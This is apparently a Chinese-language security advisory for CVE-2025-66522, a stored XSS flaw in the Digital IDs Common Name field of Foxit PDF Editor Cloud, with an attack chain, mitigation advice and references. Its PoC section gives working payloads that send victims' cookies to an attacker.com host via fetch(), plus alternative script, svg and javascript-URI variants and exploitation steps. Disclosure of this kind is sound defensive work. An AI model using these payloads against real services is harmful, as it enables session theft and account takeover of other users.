CVE-2025-66522 | Foxit PDF Editor Cloud 数字证书存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66522

漏洞类型

存储型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Foxit PDF Editor Cloud (pdfonline.foxit.com)

漏洞概述

CVE-2025-66522是Foxit PDF Editor Cloud中一个中等严重性的存储型跨站脚本(XSS)漏洞。该漏洞存在于应用程序的Digital IDs（数字证书）功能模块中，攻击者可以利用此漏洞在PDF文档中嵌入恶意代码。由于应用程序未对Digital IDs功能中Common Name（通用名称）字段的用户输入进行充分的清理和编码，当其他用户访问Digital IDs对话框或打开包含恶意证书信息的PDF文件时，嵌入的HTML或JavaScript代码将在受害者浏览器上下文中执行。攻击者可利用此漏洞窃取会话令牌、劫持用户账户、修改页面内容或进行钓鱼攻击。由于该漏洞属于存储型XSS，恶意脚本会被永久存储在服务器端，所有访问受影响PDF的用户都将受到威胁。

技术细节

该漏洞的根本原因在于Foxit PDF Editor Cloud的Digital IDs功能对用户提供的Common Name字段缺乏输入验证和输出编码。当用户创建或导入数字证书时，应用程序直接将Common Name字段的内容插入到DOM中，而未进行HTML实体编码或JavaScript过滤。攻击者可以在Common Name字段中注入包含<script>标签、事件处理器（如onerror、onload）或JavaScript URI的恶意内容。由于该数据被存储在服务器端，当受害者打开PDF文件或访问Digital IDs对话框时，恶意代码会在其浏览器中执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括读取cookie、修改DOM、发起进一步攻击等。由于Foxit PDF Editor是云端服务，该漏洞可能影响所有使用该平台处理PDF的用户。

攻击链分析

STEP 1

步骤1

攻击者访问Foxit PDF Editor Cloud平台并注册账户

STEP 2

步骤2

攻击者导航至Digital IDs功能模块，创建新的数字证书

STEP 3

步骤3

在Common Name字段中注入包含XSS payload的恶意内容，如<img src=x onerror="alert(document.cookie)">

STEP 4

步骤4

保存恶意数字证书，payload被存储在服务器端数据库中

STEP 5

步骤5

受害者打开包含该数字证书信息的PDF文件或访问Digital IDs对话框

STEP 6

步骤6

应用程序从数据库读取Common Name字段并直接插入到页面DOM中

STEP 7

步骤7

恶意XSS payload在受害者浏览器中执行，窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66522 PoC - Stored XSS in Foxit PDF Editor Cloud Digital IDs
// Create a malicious Digital ID with XSS payload in Common Name field

const maliciousCommonName = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';

// Alternative payloads:
// 1. Script tag: <script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script>
// 2. Event handler: <svg onload="fetch('https://attacker.com/log?c='+document.cookie)">
// 3. JavaScript URI: <a href="javascript:fetch('https://attacker.com/exec?c='+document.cookie)">Click</a>

// Steps to exploit:
// 1. Navigate to Foxit PDF Editor Cloud (pdfonline.foxit.com)
// 2. Access Digital IDs management section
// 3. Create new Digital ID or import certificate
// 4. In Common Name field, inject the XSS payload above
// 5. Save the Digital ID
// 6. When any user views this Digital ID or opens associated PDF,
//    the malicious script will execute in their browser context

console.log('PoC for CVE-2025-66522: Stored XSS via Digital IDs Common Name field');

影响范围

Foxit PDF Editor Cloud (pdfonline.foxit.com) - 所有未修复版本

防御指南

临时缓解措施

在官方补丁发布前，建议限制Digital IDs功能的使用权限，仅允许受信任的管理员创建和修改数字证书。同时，考虑在Web应用层实施输入过滤和输出编码，作为临时防护措施。用户应避免打开来源不明的PDF文件，并保持浏览器安全设置的最佳实践。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66522
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66522
3 Details https://www.cvedetails.com/cve/CVE-2025-66522/
4 VulDB https://vuldb.com/cve/CVE-2025-66522
5 Link https://www.foxit.com/support/security-bulletins.html